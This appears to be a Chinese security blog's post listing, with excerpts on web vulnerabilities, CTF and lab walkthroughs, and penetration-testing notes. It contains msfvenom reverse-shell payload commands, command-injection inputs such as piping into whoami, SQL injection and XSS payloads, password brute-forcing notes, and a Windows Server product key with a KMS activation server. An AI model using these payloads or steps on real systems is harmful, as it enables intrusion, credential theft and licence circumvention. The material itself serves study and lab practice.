- 博客(27)
- 收藏
- 关注
原创 XSS漏洞
XSS跨站脚本注入。允许恶意用户将代码注入网页。1.反射型:一次性。攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当用户访问该链接时,服务器接收该目标该用户的请求进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段XSS代码后,触发XSS。2.存储型持久型XSS,攻击脚本将永久存放在目标服务器的数据库或文件中,焗油很高的隐蔽性。通常在论坛、博客、留言板。3.DOM型DOM可以使程序和脚本能够动态访问和更新文档内容、结构及样式。DOM型XS
2021-03-08 15:36:21
184
1
原创 CSRF漏洞
CSRF:跨站伪造请求:攻击者利用目标用户的身份,以目标用户的名义执行某些非法操作。以目标用户的名义发送邮件、发消息,盗取目标用户的账号等。修复建议:1.验证请求的referer值,referer是一自己网站开头的域名,说明该请求安全,referer是其他网站或者空白,则很有可能是攻击。2.在请求中放入不能伪造的信息。如在http请求中以参数的形式加入一个随机产生的token,并在服务器端验证token。...
2021-03-08 15:35:36
179
原创 SSRF漏洞
SSRF:服务器端请求伪造,攻击者构造请求,由服务端发起请求。一般都是外网无法访问内部系统,由内网向外网发送请求。SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址过滤于限制。主要攻击方式:1.对外网,服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。2.攻击运行在内网或本地的应用程序。3.对内网web应用进行指纹识别,识别企业内部的资产信息。4.攻击内外网的web应用,主要使用http GET请求就可以实现的攻击,如SQLi,struts25.利
2021-03-08 15:34:55
196
原创 XXE漏洞
XML外部实体注入,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。代码漏洞分析:<?php$xmlfile = file_get_contents('php://input');$dom = new DOMDocument();$dom -> loadXML($xmlfile);$xml = simplexml_import_dom($dom);$xxe = $xml ->xxe;$str =
2021-03-08 15:34:25
210
原创 文件上传漏洞
服务器端没有对客户端上传的文件进行严格的验证和过滤,造成上传任意文件的情况,例如asp、aspx、php、jsp等脚本文件。 webshell修复建议:白名单判断文件后缀是否合法对上传后的文件进行重命名...
2021-03-08 15:33:51
95
原创 命令执行漏洞
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。hacker控制这些函数的参数时,将恶意的系统命令拼接到正常命令中,造成命令执行攻击。如:x.php?ip=127.0.0.1 | dirWindows支持的管道符:| :直接执行后面的语句。 ping 127.0.0.1 | whoami|| :前面语句执行出错。则执行后面的语句,前面语句只能为假。 ping 2 |
2021-03-08 15:32:48
353
原创 逻辑漏洞
逻辑漏洞是指攻击者利用业务设计缺陷,获取敏感信息或破坏业务的完整性。一般出现在修改密码、越权访问、密码找回、交易支付金额等功能处。越权访问有水平越权和垂直越权。水平越权:相同级别(权限)的用户或者同一角色中不同的用户之间,可以越权访问、修改或删除其他用户信息的非法操作。垂直越权:不同级别之间的用户或不同角色之间用户的越权。修复建议:越权访问主要原因是没有对用户的身份做判断和控制,可以通过session来控制。...
2021-03-08 15:31:55
130
原创 powershell常用工具
powershell常用工具:1.PowerSploit:常用于信息探测、特权提升、凭证窃取、持久化2.NiShang:集成了框架、脚本和各种payload,包含下载和执行、键盘记录、DNS、延时命令3.Empire:常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制4.PowerCat:通过与其他工具结合和重定向,可以在脚本中以多中方式使用。...
2021-03-08 15:31:18
569
原创 域环境搭建
winserver2008为域控,域中有win7、win10、Linux。域名为haocker.com:(最好是静态IP)winserver2008R2 DATAcenter激活 :打开cmd注意右键以管理员身份运行,依次输入:slmgr /ipk 74YFP-3QFB3-KQT8W-PMXWJ-7M648slmgr /skms zh.us.to( 设置kms服务器)slmgr /ato( 激活server2008)slmgr /xpr (查询激活期限)1.服务器安装AD域服务2.添加域
2021-03-04 17:21:25
195
1
原创 msfvenom生成木马大全
msfvenom生成木马Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMac m
2021-03-04 17:16:07
794
2
原创 常见SQL注入总结
没有对用户输入数据的合法性没有判断。id = 1 / id = 1’ /id = 1 and 1=1 /id = 1 and 1=2MySQL5.0后默认有information_schema数据库,表schemata、tables、columnsdatabase()、version()、user()函数limit m,n m记录开始的位置,n取的条数mysql注释符: # – /**/内联注释 /!code/?id=-1 /!union/ /!select/
2021-03-04 17:14:30
303
1
原创 BUUCTF之[极客大挑战 2019]LoveSQL
1.题:2.题样:3.万能用户或者万能密码,也可以bp:提交试试,不对。看题目是简单的SQL注入。4.http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username=1%27order%20by%2010%23%23&password=1http://ae846ab2-f07a-4986-9766-c4fb867dc32e.node3.buuoj.cn/check.php?username
2020-07-21 14:53:47
376
1
原创 BUUCTF之[极客大挑战 2019]Secret File
1.题:2.题样:3.发现一个Archive room.php:4.绝密档案:点了select后什么都没有,估计藏起来了。BP抓包,重新点select后发现一个php:访问试试:5.代码审计:highlight_file函数strstrstristr文件包含,php伪协议,base64解密:http://fdd4d84b-eead-40b9-ade9-df8198622912.node3.buuoj.cn/secr3t.php?file=php://filter/read
2020-07-20 11:31:07
374
原创 BUUCTF之[RoarCTF 2019]Easy Calc
1.题2.题样3.测试,数字,字母:字母都不能计算:查看源码,说有WAF,看到提示有一个calc.php文件,访问试试:4.?keyword=" οnclick=“alert(1)5.?keyword=”>6."><a Href='javascript:alert(1)7.11">a//8.根据源码发现直接输入href的值,javascript:alert(1)然后转译为HTML:javascri...
2020-05-12 11:02:55
140
原创 upload-labs 部分及解法
pass-01: console写代码,闭合文件检查功能,function checkfile(){}pass-02: burp改包,伪造Content-Type就能绕过验证pass-03:修改php后缀,php2、php3、php5、pht、phtmlpass-04:Apache服务器有一个特性,会从右往左开始解析文件后缀,x.php.jpg绕过pass-05:x.PHP绕过,没有同意大...
2020-05-12 11:00:01
305
原创 safeharbor靶机尝试
1.环境:KALI:49.64.20.123 靶机:192.168.111.1492. 信息收集:NmapDirb:Web访问,看网页源码,没啥东西:3. Burpsuite试试:看网页源码,四处点点:一处发现,貌似内部用户名:二处发现:每个模块网页源码没有什么发现:访问一下目录扫描出来的网址,有发现:4. 尝试是否有文件包含:空白:试试...
2020-04-01 12:40:22
282
原创 FIVE86-0,WordPress初次尝试
信息收集:开放了80端口,web登陆,发现使用WordPress框架:上wpscan,收集版本,信息等:使用wpscan爆破密码:最后爆破出用户c0rrupt3d_brain的密码为24992499使用msf的wp_admin_shell_upload获取shell:拿到shell后,几乎就已经入侵成功了,开启一个交互式shellpython3 。。。。。。,查...
2020-03-17 14:54:30
121
原创 挖矿病毒应急响应分析
Top发现CPU资源异常,wafmanager占用大量网络带宽:作为管理员来说,首先kill它:用户root运行。查询特权用户和远程登陆的账号信息,其中r00t很可疑:查看除root外的用户权限:查看账号执行过的命令:R00t:其中查看了selinux, selinux主要影响的是网络服务,如果开启了某个网络服务就要考虑是否和selinux有关系。查看...
2020-03-17 14:33:42
1586
原创 永恒之蓝简单利用,实验环境搭建及实验过程
搭建实验环境:VM:攻击机和靶机处于同一局域网内,采用NAT模式靶机 Windows7(已关闭防火墙):攻击机KALI:攻击尝试:1) 信息收集:端口445,139开着2) 查询永恒之蓝MSF可用模块:3) 使用模块,尝试攻击,获取到shell:解决中文乱码问题:Chcp 65001已获取目标主机权限,win7在CMD下开启3389端口:此时win7的3...
2020-03-17 14:13:14
2743
原创 FIVE86-2尝试
Five86-2:信息收集:web访问根据页面看出网页是WordPress搭建,上wpscan:将扫描出的用户保存user.txt,使用wpscan进行爆破:爆破时间很长:登陆barney和Stephen,发现barney有个插件漏洞,可以上传文件:制作木马文件index.zip,制作时一定要加上一个html->简单的也行:上传zip,拿shell:...
2020-03-17 12:02:11
234
原创 FIVE-86-1尝试
Five86-1:信息收集:2.80web访问:扫描目录:获取且查看robots.txt:访问ona,是典型的WordPress框架:OpenNetAdmin漏洞发现:将47772.rb文件放入msf攻击载荷的文件夹(477772.rb可以网上搜索下载):过载一下加载核,msf使用47772.rb获取shell:查看提示:...
2020-03-17 11:18:04
200
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人